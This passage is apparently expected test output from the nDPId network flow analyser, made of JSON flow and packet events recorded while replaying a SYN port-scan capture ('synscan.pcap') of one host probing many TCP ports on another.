-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_packet_id":1,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060701,"pkt":"ACYLMQczACWzv5HuCABFAAAsVaQAADQGvs6sEAAIQA2GNIzS0x3dUoMYAAAAAGACBABhcQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_packet_id":1,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060743,"pkt":"ACYLMQczACWzv5HuCABFAAAs3tQAACgGQZ6sEAAIQA2GNIzTwBfdU4MZAAAAAGACBAB0dAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsp9QAACoGdp6sEAAIQA2GNIzTH5HdU4MZAAAAAGACDAAM+wAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAssgkAAC4GaGmsEAAIQA2GNIzTzcHdU4MZAAAAAGACDABeygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsOvEAACYG54GsEAAIQA2GNIzTG1zdU4MZAAAAAGACDAARMAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzcAACwGtTusEAAIQA2GNIzTatjdU4MZAAAAAGACBADJswAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs9\/IAADoGFoCsEAAIQA2GNIzTHRPdU4MZAAAAAGACDAAPeQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsc2kAAC4GpwmsEAAIQA2GNIzTE4zdU4MZAAAAAGACDAAZAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsV7wAADIGvrasEAAIQA2GNIzTCpbdU4MZAAAAAGACDAAh9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs1zgAADUGPDqsEAAIQA2GNIzTCbzdU4MZAAAAAGACCAAm0AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsUiMAADkGvU+sEAAIQA2GNIzTA+jdU4MZAAAAAGACCAAspAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fMAADAGGn+sEAAIQA2GNIzTDMXdU4MZAAAAAGACBAAnxwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAskBMAACkGj1+sEAAIQA2GNIzTB9fdU4MZAAAAAGACCAAotQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsfuEAADkGkJGsEAAIQA2GNIzTGaXdU4MZAAAAAGACCAAW5wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zgAACwGHTqsEAAIQA2GNIzTDzHdU4MZAAAAAGACBAAlWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsSNkAADcGyJmsEAAIQA2GNIzSBFndUoMYAAAAAGACEAAkNgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsMkkAACkG7SmsEAAIQA2GNIzSD5LdUoMYAAAAAGACCAAg\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsmhQAACcGh16sEAAIQA2GNIzSIPvdUoMYAAAAAGACEAAHlAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsTp0AACcG0tWsEAAIQA2GNIzSBB7dUoMYAAAAAGACEAAkcQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAssqIAACgGbdCsEAAIQA2GNIzSVEPdUoMYAAAAAGACBADgSwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAs7IIAAC4GLfCsEAAIQA2GNIzSFz7dUoMYAAAAAGACDAAVUQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsgF8AADEGlxOsEAAIQA2GNIzSI4zdUoMYAAAAAGACCAANAwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsiDYAADsGhTysEAAIQA2GNIzSwPjdUoMYAAAAAGACEABnlgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsHRgAADcG9FqsEAAIQA2GNIzSBGrdUoMYAAAAAGACEAAkJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsbK4AACcGtMSsEAAIQA2GNIzSCzvdUoMYAAAAAGACEAAdVAAAAgQFtA=="} 